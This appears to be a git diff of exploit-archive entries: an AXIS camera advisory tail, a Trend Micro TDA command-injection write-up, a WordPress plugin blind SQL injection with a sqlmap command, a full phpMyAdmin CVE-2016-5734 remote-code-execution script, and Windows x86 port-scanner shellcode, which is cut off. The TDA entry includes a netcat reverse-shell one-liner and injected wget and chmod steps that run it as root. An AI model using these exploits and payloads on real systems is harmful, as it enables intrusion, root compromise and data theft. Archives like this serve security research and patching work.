9394b3577bdb17cb9f74e56433a0e660 +AXIS Q3709-PVE 5.75.1.1 e9fb87337c0a24139a40459336f0bcb3 +AXIS Q6000-E 5.65.1.1 b97df19057db1134a43c26f5ddf484de +AXIS Q6032 5.41.1.2 8caad5cd7beeebaf5b05b011b8a1e104 +AXIS Q6032-C 5.41.3 58213a4b1c7a980dcb3b54bbee657506 +AXIS Q6032-E 5.41.1.4 b4aa977b254694b5d14d7e87e5652a6b +AXIS Q6034 5.41.1.1 4f44a8661534bac08a50651ee90a7d47 +AXIS Q6034-C 5.41.3 25d455dc2e2d11639f29b0b381ddd7cb +AXIS Q6034-E 5.41.1.2 3bfab61354170e42ce27fc2477d57026 +AXIS Q6035 5.41.1.2 9d124d096bf48fbfd2e11c34de3c880d +AXIS Q6035-C 5.41.3 42d23ae4d0b1456cc54e54734a586d53 +AXIS Q6035-E 5.41.1.5 e2123a9e37fda4044847c810b7f25253 +AXIS Q6042 5.70.1.1 4f253ed4bb0efaa4a845e0e9bd666766 +AXIS Q6042-C 5.70.1.1 21bd154f706091b348c33dd9564438da +AXIS Q6042-E 5.70.1.2 9d5dc03268638498d0299bf466fa0501 +AXIS Q6042-S 5.70.1.1 085fc5903d99899d78b48abb9cafdecd +AXIS Q6044 5.70.1.1 29e4cdb9ba2f18953512c5d1e17229c1 +AXIS Q6044-C 5.70.1.1 dc3fc472b88e07278e6ff82eaee71a8d +AXIS Q6044-E 5.70.1.2 83d1e6c1fe5aa9c26710eed03721f928 +AXIS Q6044-S 5.70.1.1 654ffd048fdb41ae3c86da4f41e2a31d +AXIS Q6045 5.70.1.1 2db9b247729e9487f476a35a6dd456ce +AXIS Q6045-C 5.70.1.1 9bb561126e2b4f69ac526cfccdf254f6 +AXIS Q6045-C-MkII 5.70.1.1 2c9efccb0fba0e63fc4fff73e6ba0fea +AXIS Q6045-E 5.70.1.2 321a5d906863787fdc5e34483e6ec2a8 +AXIS Q6045-E-MkII 5.70.1.2 d9d4242a83b1ed225dd3c20530da034d +AXIS Q6045-MkII 5.70.1.1 686f0fe8727e2a726091c9ddf3827741 +AXIS Q6045-S 5.70.1.1 43473e42f360efb4ea6f84da35fd9746 +AXIS Q6045-S-Mk-II 5.70.1.1 d747a5a3d69264af8448f72822e8d60b +AXIS Q6114-E 5.65.2.1 8cb9a3a88c79ebb2cf5def3cda0da148 +AXIS Q6115-E 5.65.2.1 7d2dd3410ce505cd04a1c182917523a5 +AXIS Q6128-E 5.85.2.1 49508ff56508f809a75d367896e8d56f +AXIS Q7401 5.50.4 99855c6c9777fdd5fc5e58349ae861a5 +AXIS Q7404 5.50.4.2 ffdbee7c9daad303e89a432ba9c4711d +AXIS Q7404 5.50.4 6e31e9709cf9717968c244267aa8c6d0 +AXIS Q7406 5.51.2 3cdb7935278157b9c91c334613012b1e +AXIS Q7411 5.90.1 26893adedcfc1953829084e8e7c3fbdd +AXIS Q7414 5.51.2 8ff659a8db077b545205f56dfef217d4 +AXIS Q7424-R 5.50.4 d570ef1886c84ab53934fc51385e8aa7 +AXIS Q7424-R-MkII 5.51.3 964a13f6b1aef17562cbbde11d936dee +AXIS Q7436 5.90.1 8fe1ef95b231bf6f771c3edc0fbc8afd +AXIS Q8414-LVS 6.10.1 9529cd9cf3b3bd66bec22c0b1c7448cd +AXIS Q8631-E 5.75.1 c7f882afc268ca3d60d07d5770db6a51 +AXIS Q8632-E 5.75.1 f01d9a86d21335fe3d78e634858b9e77 +AXIS Q8665-LE 5.90.1.1 1549b56d34250a93bbcf7b24b4f63699 +AXIS V5915 5.75.1.1 a1c39a9cd545091825001a831d0c1ea4 + + +Vendor Information, Solutions and Workarounds ++++++++++++++++++++++++++++++++++++++++++++++ +According to the Vendor, tickets was opened to correct this issue. + +Credits ++++++++ +These vulnerabilities has been discovered and published by Orwelllabs. + + +Timeline +++++++++ +2015-09-10: First attempt to contact Vendor +2015-10-30: Vulnerability was reported to CERT +2015-11-30: CVE-IDs are assigned +2016-07-25: Since the first vulnerability was published (09.04.2016 - +EDB-ID: 39683) +a long conversation revolved around these vulnerabilities with the +manufacturer. +We maintained communication since 15/04/2016 until now. +As there is still disagreement regarding vulnerabilities (and botnets in +the wild: https://goo.gl/k79I8u), +we thought it good to publish this advisory, since it has already exhausted +all deadlines. + + +Legal Notices ++++++++++++++ +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. We accept no +responsibility for any damage caused by the use or misuse of this +information. + + +About Orwelllabs +++++++++++++++++ +# Loadind k4fK43sQu3 m0dule... diff --git a/platforms/linux/webapps/40180.txt b/platforms/linux/webapps/40180.txt new file mode 100755 index 000000000..1d4a467cb --- /dev/null +++ b/platforms/linux/webapps/40180.txt @@ -0,0 +1,54 @@ +Version: TDA 2.6.1062r1 + +Summary: + +The hotfix_upload.cgi file contains a flaw allowing a user to execute commands under the context of the root user. + +Details: + +The hotfix_upload.cgi file is used to upload files (hot fixes). Below is a sample of the upload function being used: + +POST /cgi-bin/hotfix_upload.cgi?sID=hotfix_temp HTTP/1.1 +Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */* +Referer: https:///cgi-bin/hotfix_history.cgi +Accept-Language: en-US +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) +Content-Type: multipart/form-data; boundary=—————————7e0823930136 +UA-CPU: AMD64 +Accept-Encoding: gzip, deflate +Host: +Content-Length: 206 +Connection: close +Cache-Control: no-cache +Cookie: session_id= + +—————————–7e0823930136 +Content-Disposition: form-data; name=”ajaxuploader_file”; filename=”test.txt” +Content-Type: text/plain + +a +—————————–7e0823930136– + +The actual injection takes place in the name of the file being uploaded (ie. filename=”test.txt&id”). By performing the following request, system information is sent back in the response: + +http://www.korpritzombie.com/wp-content/uploads/2016/07/1.png + +This gives any user the ability to execute simple non interactive commands. However, more complex (including remote shell) commands are possible. + +Special characters like ‘/’,'<‘,’>’ are not sent across to the server. But utilizing the environment itself, it becomes possible to insert characters like the ‘/’. Below is an example of a user using this method to retrieve the /etc/passwd file (NOTE: `echo $PATH | cut -c1` will print ‘/‘ to the final command): + +http://www.korpritzombie.com/wp-content/uploads/2016/07/2.png + +Now the attacker has the ability to create a shell by uploading a file containing the following (where [ip address] is your receiving machine): + +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f + +To upload the file, the attacker simply names this file to shell, then uploads using this vulnerability and wget: + +test.txt&wget http:`echo $PATH | cut -c1“echo $PATH | cut -c1`[ip]`echo $PATH | cut -c1`shell + +Once the file has been uploaded (it will be placed in /opt/TrendMicro/MinorityReport/www/cgi-bin), the attacker can chmod and then execute the file as a script, creating a reverse shell, running as root: + +test.xml&chmod a+x shell + +test.xml&.`echo $PATH | cut -c1`shell \ No newline at end of file diff --git a/platforms/multiple/dos/40183.html b/platforms/multiple/dos/40183.html new file mode 100755 index 000000000..7481d8278 --- /dev/null +++ b/platforms/multiple/dos/40183.html @@ -0,0 +1,60 @@ + + + + + + + diff --git a/platforms/multiple/dos/40184.html b/platforms/multiple/dos/40184.html new file mode 100755 index 000000000..cde98c037 --- /dev/null +++ b/platforms/multiple/dos/40184.html @@ -0,0 +1,56 @@ + + + + + + + diff --git a/platforms/php/webapps/40174.txt b/platforms/php/webapps/40174.txt new file mode 100755 index 000000000..b6aa2ea32 --- /dev/null +++ b/platforms/php/webapps/40174.txt @@ -0,0 +1,100 @@ +# Exploit Title: Wordpress Ultimate-Product-Catalog <= 3.9.8 (do_shortcode via ajax) Unsanitized shortcode attributes - Unauthenticated Blind SQL Injection +# Date: 2016-07-28 +# Google Dork: "Index of /wp-content/plugins/ultimate-product-catalogue/" +# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ] +# Vendor Homepage: http://www.EtoileWebDesign.com/ +# plugin uri: http://www.EtoileWebDesign.com/ultimate-product-catalogue/ +# Software Link: +# Version: <=3.9.8 +# Tested on: windows 7 + firefox. + +==================== + DESCRIPTION +==================== + +A vulnerability has been discvered in the wordpress Ultimate Product Catalog by affecting v3.9.8 and below (tested). +Due to a unsanitized parameters passed to the shorcode function `Insert_Product_Catalog` [ "product-catalogue" ] +located in `/Funtions/Shortcodes.php` line 4: + +function Insert_Product_Catalog($atts) { + // Select the catalogue information from the database + ... + + $Catalogue = $wpdb->get_row("SELECT * FROM $catalogues_table_name WHERE Catalogue_ID=" . $id); + $CatalogueItems = $wpdb->get_results("SELECT * FROM $catalogue_items_table_name WHERE Catalogue_ID=" . $id . " ORDER BY Position"); + ... + + return $ProductString; +} + +The $id parameter is extracted with `extract` function from $atts. This is a vulnerability with which can be exploited by creating shortcodes with +malicious attributes, exploitable only by administrators, editors, authors. But in file `/Functions/Process_Ajax.php` line 113... + +function UPCP_Filter_Catalogue() { + $Path = ABSPATH . 'wp-load.php'; + include_once($Path); + + $id = $_POST['id']; <-- we can control this value!! + + ... + + echo do_shortcode("[product-catalogue id='" . $id . "' only_inner='Yes' starting_layout='" . $start_layout . "' excluded_layouts='" . $exclude_layouts . "' current_page='" . $current_page . "' ajax_reload='" . $ajax_reload . "' ajax_url='" . $ajax_url . "' request_count='" . $request_count . "' category='" . $Category . "' subcategory='" . $SubCategory . "' tags='" . $Tags . "' custom_fields='" . $Custom_Fields . "' prod_name='" . $Prod_Name . "' min_price='" . $Min_Price . "' max_price='" . $Max_Price . "']"); +} + + +This is interesting because that function calls `do_shortcode` executing the shortcode 'product-catalogue' as a result, this calls `Insert_Product_Catalog` wich +I found the SQLi, now we need to found a place where ` UPCP_Filter_Catalogue` is called and in line 138-139 i found... + +... +add_action('wp_ajax_update_catalogue', 'UPCP_Filter_Catalogue'); +add_action( 'wp_ajax_nopriv_update_catalogue', 'UPCP_Filter_Catalogue'); +... + +this means that we can execute that function only with a request to `/wp-admin/admin-ajax.php?action=update_catalogue` and send the vulnerable $id parameter +with our custom payload. Note that `wp_ajax_nopriv` prefix makes this vulnerability exploitable by unauthenticated users. + +Example: + +http:////wp-admin/admin-ajax.php?action=update_catalogue + +POSTDATA: id=0+or+(our+custom+select+here)+-- + + +An attacker can exploit this vulnerability and compromise all user records or take over control of the host machine. + +============== + POC +============== +----------------- +//REQUEST +------------------ + +POST /wordpress/wp-admin/admin-ajax.php?action=update_catalogue HTTP/1.1 +Host: localhost +Content-Length: 21 +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept-Language: es-ES,es;q=0.8 +Cookie: + +id=1+OR+SLEEP(10)+--+ + +-------------------------- + EXPLOITING WITH SQLMAP +------------------------ + +sqlmap --url="http:////wp-admin/admin-ajax.php?action=update_catalogue" --data="id=1" --level=5 --risk=3 --technique=B -p id --dbs --dbms=mysql + +(listing all available databases) + + +================================== +time-line +=================================== + +2016-07-28: reported to vendor. +2016-07-28: vendor released plugin version 3.9.9. saying in changelog "Minor ajax update to switch to a prepared statement". +2016-07-29: public disclousure. +=================================== \ No newline at end of file diff --git a/platforms/php/webapps/40185.py b/platforms/php/webapps/40185.py new file mode 100755 index 000000000..2b4f0244c --- /dev/null +++ b/platforms/php/webapps/40185.py @@ -0,0 +1,119 @@ +#!/usr/bin/env python + +"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit +Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7. +CVE: CVE-2016-5734 +Author: https://twitter.com/iamsecurity +run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');" +""" + +import requests +import argparse +import sys + +__author__ = "@iamsecurity" + +if __name__ == '__main__': + parser = argparse.ArgumentParser() + parser.add_argument("url", type=str, help="URL with path to PMA") + parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()") + parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user") + parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user") + parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server") + parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.") + arguments = parser.parse_args() + url_to_pma = arguments.url + uname = arguments.user + upass = arguments.pwd + if arguments.dbs: + db = arguments.dbs + else: + db = "test" + token = False + custom_table = False + if arguments.table: + custom_table = True + table = arguments.table + else: + table = "prgpwn" + if arguments.cmd: + payload = arguments.cmd + else: + payload = "system('uname -a');" + + size = 32 + s = requests.Session() + # you can manually add proxy support it's very simple ;) + # s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"} + s.verify = False + sql = '''CREATE TABLE `{0}` ( + `first` varchar(10) CHARACTER SET utf8 NOT NULL + ) ENGINE=InnoDB DEFAULT CHARSET=latin1; + INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500')); + '''.format(table) + + # get_token + resp = s.post(url_to_pma + "/?lang=en", dict( + pma_username=uname, + pma_password=upass + )) + if resp.status_code is 200: + token_place = resp.text.find("token=") + 6 + token = resp.text[token_place:token_place + 32] + if token is False: + print("Cannot get valid authorization token.") + sys.exit(1) + + if custom_table is False: + data = { + "is_js_confirmed": "0", + "db": db, + "token": token, + "pos": "0", + "sql_query": sql, + "sql_delimiter": ";", + "show_query": "0", + "fk_checks": "0", + "SQL": "Go", + "ajax_request": "true", + "ajax_page_request": "true", + } + resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies)) + if resp.status_code == 200: + if "success" in resp.json(): + if resp.json()["success"] is False: + first = resp.json()["error"][resp.json()["error"].find("")+6:] + error = first[:first.find("")] + if "already exists" in error: + print(error) + else: + print("ERROR: " + error) + sys.exit(1) + # build exploit + exploit = { + "db": db, + "table": table, + "token": token, + "goto": "sql.php", + "find": "0/e\0", + "replaceWith": payload, + "columnIndex": "0", + "useRegex": "on", + "submit": "Go", + "ajax_request": "true" + } + resp = s.post( + url_to_pma + "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar(s.cookies) + ) + if resp.status_code == 200: + result = resp.json()["message"][resp.json()["message"].find("")+8:] + if len(result): + print("result: " + result) + sys.exit(0) + print( + "Exploit failed!\n" + "Try to manually set exploit parameters like --table, --database and --token.\n" + "Remember that servers with PHP version greater than 5.4.6" + " is not exploitable, because of warning about null byte in regexp" + ) + sys.exit(1) diff --git a/platforms/win_x86/shellcode/40175.c b/platforms/win_x86/shellcode/40175.c new file mode 100755 index 000000000..0d85ec1d7 --- /dev/null +++ b/platforms/win_x86/shellcode/40175.c @@ -0,0 +1,583 @@ +/* + # Title : Windows x86 localhost port scanner shellcode + # Date : 29-07-2016 + # Author : Roziul Hasan Khan Shifat + # Tested on : Windows 7 x86 starter + +*/ + + +/* + +Disassembly of section .text: + +00000000 <_start>: + 0: 31 db xor %ebx,%ebx + 2: 64 8b 43 30 mov %fs:0x30(%ebx),%eax + 6: 8b 40 0c mov 0xc(%eax),%eax + 9: 8b 70 14 mov 0x14(%eax),%esi + c: ad lods %ds:(%esi),%eax + d: 96 xchg %eax,%esi + e: ad lods %ds:(%esi),%eax + f: 8b 58 10 mov 0x10(%eax),%ebx + 12: 31 d2 xor %edx,%edx + 14: 8b 53 3c mov 0x3c(%ebx),%edx + 17: 01 da add %ebx,%edx + 19: 8b 52 78 mov 0x78(%edx),%edx + 1c: 01 da add %ebx,%edx + 1e: 8b 72 20 mov 0x20(%edx),%esi + 21: 01 de add %ebx,%esi + 23: 31 c9 xor %ecx,%ecx + +00000025 : + 25: 41 inc %ecx + 26: ad lods %ds:(%esi),%eax + 27: 01 d8 add %ebx,%eax + 29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) + 2f: 75 f4 jne 25 + 31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) + 38: 75 eb jne 25 + 3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) + 41: 75 e2 jne 25 + 43: 8b 72 1c mov 0x1c(%edx),%esi + 46: 01 de add %ebx,%esi + 48: 8b 14 8e mov (%esi,%ecx,4),%edx + 4b: 01 da add %ebx,%edx + 4d: 31 f6 xor %esi,%esi + 4f: 89 d6 mov %edx,%esi + 51: 89 df mov %ebx,%edi + 53: 31 c9 xor %ecx,%ecx + 55: 68 6c 6f 63 41 push $0x41636f6c + 5a: 88 4c 24 03 mov %cl,0x3(%esp) + 5e: 68 61 6c 41 6c push $0x6c416c61 + 63: 68 47 6c 6f 62 push $0x626f6c47 + 68: 54 push %esp + 69: 53 push %ebx + 6a: ff d2 call *%edx + 6c: 83 c4 0c add $0xc,%esp + 6f: 31 c9 xor %ecx,%ecx + 71: b1 20 mov $0x20,%cl + 73: 51 push %ecx + 74: 31 c9 xor %ecx,%ecx + 76: 51 push %ecx + 77: ff d0 call *%eax + 79: 89 f1 mov %esi,%ecx + 7b: 89 c6 mov %eax,%esi + 7d: 89 0e mov %ecx,(%esi) + 7f: 31 c9 xor %ecx,%ecx + 81: 68 65 65 41 41 push $0x41416565 + 86: 88 4c 24 02 mov %cl,0x2(%esp) + 8a: 68 61 6c 46 72 push $0x72466c61 + 8f: 68 47 6c 6f 62 push $0x626f6c47 + 94: 54 push %esp + 95: 57 push %edi + 96: 8b 16 mov (%esi),%edx + 98: ff d2 call *%edx + 9a: 83 c4 0c add $0xc,%esp + 9d: 89 46 04 mov %eax,0x4(%esi) + a0: 31 c9 xor %ecx,%ecx + a2: 51 push %ecx + a3: 68 61 72 79 41 push $0x41797261 + a8: 68 4c 69 62 72 push $0x7262694c + ad: 68 4c 6f 61 64 push $0x64616f4c + b2: 54 push %esp + b3: 57 push %edi + b4: 8b 16 mov (%esi),%edx + b6: ff d2 call *%edx + b8: 83 c4 0c add $0xc,%esp + bb: 89 46 08 mov %eax,0x8(%esi) + be: 31 c9 xor %ecx,%ecx + c0: 68 6c 6c 41 41 push $0x41416c6c + c5: 88 4c 24 02 mov %cl,0x2(%esp) + c9: 68 72 74 2e 64 push $0x642e7472 + ce: 68 6d 73 76 63 push $0x6376736d + d3: 54 push %esp + d4: ff d0 call *%eax + d6: 83 c4 0c add $0xc,%esp + d9: 89 c7 mov %eax,%edi + db: 31 c9 xor %ecx,%ecx + dd: 51 push %ecx + de: 68 74 66 5f 73 push $0x735f6674 + e3: 68 70 72 69 6e push $0x6e697270 + e8: 54 push %esp + e9: 50 push %eax + ea: 8b 16 mov (%esi),%edx + ec: ff d2 call *%edx + ee: 83 c4 08 add $0x8,%esp + f1: 89 46 0c mov %eax,0xc(%esi) + f4: 31 c9 xor %ecx,%ecx + f6: 51 push %ecx + f7: 68 65 78 69 74 push $0x74697865 + fc: 54 push %esp + fd: 57 push %edi + fe: 8b 16 mov (%esi),%edx + 100: ff d2 call *%edx + 102: 83 c4 08 add $0x8,%esp + 105: 89 46 10 mov %eax,0x10(%esi) + 108: 8b 56 08 mov 0x8(%esi),%edx + 10b: 31 c9 xor %ecx,%ecx + 10d: 68 64 6c 6c 41 push $0x416c6c64 + 112: 88 4c 24 03 mov %cl,0x3(%esp) + 116: 68 6b 33 32 2e push $0x2e32336b + 11b: 68 77 73 6f 63 push $0x636f7377 + 120: 54 push %esp + 121: ff d2 call *%edx + 123: 83 c4 0c add $0xc,%esp + 126: 89 c7 mov %eax,%edi + 128: 31 c9 xor %ecx,%ecx + 12a: 68 75 70 41 41 push $0x41417075 + 12f: 88 4c 24 02 mov %cl,0x2(%esp) + 133: 68 74 61 72 74 push $0x74726174 + 138: 68 57 53 41 53 push $0x53415357 + 13d: 54 push %esp + 13e: 50 push %eax + 13f: 8b 16 mov (%esi),%edx + 141: ff d2 call *%edx + 143: 89 46 14 mov %eax,0x14(%esi) + 146: 83 c4 0c add $0xc,%esp + 149: 68 65 74 41 41 push $0x41417465 + 14e: 31 c9 xor %ecx,%ecx + 150: 88 4c 24 02 mov %cl,0x2(%esp) + 154: 68 73 6f 63 6b push $0x6b636f73 + 159: 54 push %esp + 15a: 57 push %edi + 15b: 8b 16 mov (%esi),%edx + 15d: ff d2 call *%edx + 15f: 89 46 18 mov %eax,0x18(%esi) + 162: 83 c4 08 add $0x8,%esp + 165: 68 65 63 74 41 push $0x41746365 + 16a: 31 c9 xor %ecx,%ecx + 16c: 88 4c 24 03 mov %cl,0x3(%esp) + 170: 68 63 6f 6e 6e push $0x6e6e6f63 + 175: 54 push %esp + 176: 57 push %edi + 177: 8b 16 mov (%esi),%edx + 179: ff d2 call *%edx + 17b: 83 c4 08 add $0x8,%esp + 17e: 89 46 1c mov %eax,0x1c(%esi) + 181: 31 c9 xor %ecx,%ecx + 183: 68 6b 65 74 41 push $0x4174656b + 188: 88 4c 24 03 mov %cl,0x3(%esp) + 18c: 68 65 73 6f 63 push $0x636f7365 + 191: 68 63 6c 6f 73 push $0x736f6c63 + 196: 54 push %esp + 197: 57 push %edi + 198: 8b 16 mov (%esi),%edx + 19a: ff d2 call *%edx + 19c: 83 c4 0c add $0xc,%esp + 19f: 89 46 08 mov %eax,0x8(%esi) + 1a2: 8b 56 14 mov 0x14(%esi),%edx + 1a5: 31 c9 xor %ecx,%ecx + 1a7: 66 b9 90 01 mov $0x190,%cx + 1ab: 29 cc sub %ecx,%esp + 1ad: 66 b9 02 02 mov $0x202,%cx + 1b1: 8d 1c 24 lea (%esp),%ebx + 1b4: 53 push %ebx + 1b5: 51 push %ecx + 1b6: ff d2 call *%edx + 1b8: 31 ff xor %edi,%edi + +000001ba : + 1ba: 31 d2 xor %edx,%edx + 1bc: b2 06 mov $0x6,%dl + 1be: 52 push %edx + 1bf: 83 ea 05 sub $0x5,%edx + 1c2: 52 push %edx + 1c3: 42 inc %edx + 1c4: 52 push %edx + 1c5: 8b 56 18 mov 0x18(%esi),%edx + 1c8: ff d2 call *%edx + 1ca: 89 c3 mov %eax,%ebx + 1cc: 31 d2 xor %edx,%edx + 1ce: 52 push %edx + 1cf: 52 push %edx + 1d0: 52 push %edx + 1d1: 52 push %edx + 1d2: 31 c0 xor %eax,%eax + 1d4: b0 ff mov $0xff,%al + 1d6: 40 inc %eax + 1d7: f7 e7 mul %edi + 1d9: c6 04 24 02 movb $0x2,(%esp) + 1dd: 89 44 24 02 mov %eax,0x2(%esp) + 1e1: 8d 14 24 lea (%esp),%edx + 1e4: 31 c9 xor %ecx,%ecx + 1e6: b1 10 mov $0x10,%cl + 1e8: 53 push %ebx + 1e9: 51 push %ecx + 1ea: 52 push %edx + 1eb: 53 push %ebx + 1ec: 8b 46 1c mov 0x1c(%esi),%eax + 1ef: ff d0 call *%eax + 1f1: 5b pop %ebx + 1f2: 83 c4 10 add $0x10,%esp + 1f5: 31 c9 xor %ecx,%ecx + 1f7: 51 push %ecx + 1f8: 68 20 20 20 0a push $0xa202020 + 1fd: 68 3e 20 25 64 push $0x6425203e + 202: 68 25 64 20 2d push $0x2d206425 + 207: 54 push %esp + 208: 59 pop %ecx + 209: 50 push %eax + 20a: 57 push %edi + 20b: 51 push %ecx + 20c: 8b 46 0c mov 0xc(%esi),%eax + 20f: ff d0 call *%eax + 211: 83 c4 10 add $0x10,%esp + 214: 53 push %ebx + 215: 8b 46 08 mov 0x8(%esi),%eax + 218: ff d0 call *%eax + 21a: 47 inc %edi + 21b: 83 ff 65 cmp $0x65,%edi + 21e: 75 9a jne 1ba + 220: 8b 46 04 mov 0x4(%esi),%eax + 223: 8b 7e 10 mov 0x10(%esi),%edi + 226: 56 push %esi + 227: ff d0 call *%eax + 229: 50 push %eax + 22a: ff d7 call *%edi + +*/ + + +/* + +section .text + global _start +_start: + +xor ebx,ebx +mov eax,[fs:ebx+0x30] +mov eax,[eax+0xc] +mov esi,[eax+0x14] +lodsd +xchg esi,eax +lodsd +mov ebx,[eax+0x10] ;kernel32.dll base address + + +xor edx,edx +mov edx,[ebx+0x3c] +add edx,ebx +mov edx,[edx+0x78] +add edx,ebx ;IMAGE_EXPORT_DIRECTORY + + +mov esi,[edx+0x20] +add esi,ebx ;AddressOfNames + +xor ecx,ecx +getp: +inc ecx +lodsd +add eax,ebx +cmp dword [eax],'GetP' +jnz getp +cmp dword [eax+4],'rocA' +jnz getp +cmp dword [eax+8],'ddre' +jnz getp + +mov esi,[edx+0x1c] +add esi,ebx ;AddressOfFunctions + + +mov edx,[esi+ecx*4] +add edx,ebx ;GetProcAddress() + + +;---------------------------------- + +xor esi,esi +mov esi,edx ;GetProcAddress() +mov edi,ebx ;kernel32 base address + +;------------------------------ + +;finding address of GlobalAlloc() +xor ecx,ecx +push 0x41636f6c +mov [esp+3],byte cl +push 0x6c416c61 +push 0x626f6c47 + +push esp +push ebx +call edx +add esp,12 +;--------------------------- +;GlobalAlloc(0x00,4*8) sizeof every function address 4 byte and i will store address of 8 functions + +xor ecx,ecx +mov cl,32 +push ecx +xor ecx,ecx +push ecx +call eax + +;-------------------------------- + +mov ecx,esi +mov esi,eax + +mov [esi],dword ecx ;GetProcAddress() at offset 0 + +;---------------------------------- +;finding address of GlobalFree() +xor ecx,ecx +push 0x41416565 +mov [esp+2],byte cl +push 0x72466c61 +push 0x626f6c47 + +push esp +push edi +mov edx,dword [esi] +call edx +add esp,12 + +;---------------------- +mov [esi+4],dword eax ;GlobalFree() at offset 4 +;------------------------ +;finding address of LoadLibraryA() +xor ecx,ecx +push ecx +push 0x41797261 +push 0x7262694c +push 0x64616f4c + +push esp +push edi +mov edx,dword [esi] +call edx + +add esp,12 + +;---------------------- +mov [esi+8],dword eax ;LoadLibraryA() at offset 8 +;------------------------ + +;loading msvcrt.dll +xor ecx,ecx +push 0x41416c6c +mov [esp+2],byte cl +push 0x642e7472 +push 0x6376736d + +push esp +call eax +add esp,12 + +;------------------------- +mov edi,eax ;msvcrt.dll base address +;----------------------- +;finding address of printf() +xor ecx,ecx +push ecx +push 0x735f6674 +push 0x6e697270 + +push esp +push eax +mov edx,dword [esi] +call edx +add esp,8 +;---------------------- +mov [esi+12],dword eax ;printf() at offset 12 +;--------------------- +;finding address of exit() +xor ecx,ecx +push ecx +push 'exit' +push esp +push edi +mov edx,dword [esi] +call edx +add esp,8 +;--------------------- +mov [esi+16],dword eax ;exit() at offset 16 +;-------------------------------- +;loading wsock32.dll + +mov edx,dword [esi+8] +xor ecx,ecx +push 0x416c6c64 +mov [esp+3],byte cl +push 0x2e32336b +push 0x636f7377 + +push esp +call edx +add esp,12 +;---------------------- +mov edi,eax ;wsock32.dll +;--------------------- +;finding address of WSAStartup() +xor ecx,ecx +push 0x41417075 +mov [esp+2],byte cl +push 0x74726174 +push 0x53415357 + +push esp +push eax +mov edx,dword [esi] +call edx +;--------------------- +mov [esi+20],dword eax ;WSAStartup() at offset 20 +;---------------------- +add esp,12 +;finding address of socket() +push 0x41417465 +xor ecx,ecx +mov [esp+2],byte cl +push 0x6b636f73 + +push esp +push edi +mov edx,dword [esi] +call edx +;------------------------------- +mov [esi+24],dword eax ;socket() at offset 24 +;------------------------------ +add esp,8 +;finding address connect() +push 0x41746365 +xor ecx,ecx +mov [esp+3],byte cl +push 0x6e6e6f63 + +push esp +push edi +mov edx,dword [esi] +call edx +add esp,8 +;------------------------- +mov [esi+28],dword eax ;connect() at offset 28 +;--------------------------------- +;finding address of closesocket() +xor ecx,ecx +push 0x4174656b +mov [esp+3],byte cl +push 0x636f7365 +push 0x736f6c63 + +push esp +push edi +mov edx,dword [esi] +call edx +add esp,12 +;--------------------------- +mov [esi+8],dword eax ;closesocket() at offset 8 +;--------------------------------- + +;------------------- +;WSAStartup(514,&wsa) +mov edx,dword [esi+20] ;edx=WSAStartup() +xor ecx,ecx +mov cx,400 +sub esp,ecx +mov cx,514 +lea ebx,[esp] +push ebx +push ecx +call edx + + +;--------------------- +xor edi,edi ;port scanning start from 0 - 100 + +scan: +;socket(2,1,6) +xor edx,edx +mov dl,6 +push edx +sub edx,5 +push edx +inc edx +push edx +mov edx,dword [esi+24] ;socket() +call edx +;---------------------- +;connect() +mov ebx,eax ;SOCKET +xor edx,edx +push edx +push edx +push edx +push edx + +xor eax,eax +mov al,255 +inc eax +mul edi +mov [esp],byte 2 +mov [esp+2],word eax +;mov [esp+4],dword 0x81e8a8c0 ;Use it to scan foreign host + + +lea edx,[esp] + +xor ecx,ecx +mov cl,16 +push ebx +push ecx +push edx +push ebx + +mov eax,[esi+28] ;connect() +call eax + +pop ebx ;SOCKET +add esp,16 +xor ecx,ecx +push ecx +push 0x0a202020 +push 0x6425203e +push 0x2d206425 + + +push esp +pop ecx + +push eax +push edi +push ecx +mov eax,dword [esi+12] ;printf() +call eax + +add esp,16 +push ebx ;SOCKET +mov eax,dword [esi+8] ;closesocket() +call eax + +inc edi +cmp edi,101 +jne scan + + + +mov eax,dword [esi+4] ;GlobalFree() +mov edi,dword [esi+16] ;exit() + +push esi +call eax + +push eax +call edi + +*/ + +#include +#include + + +char 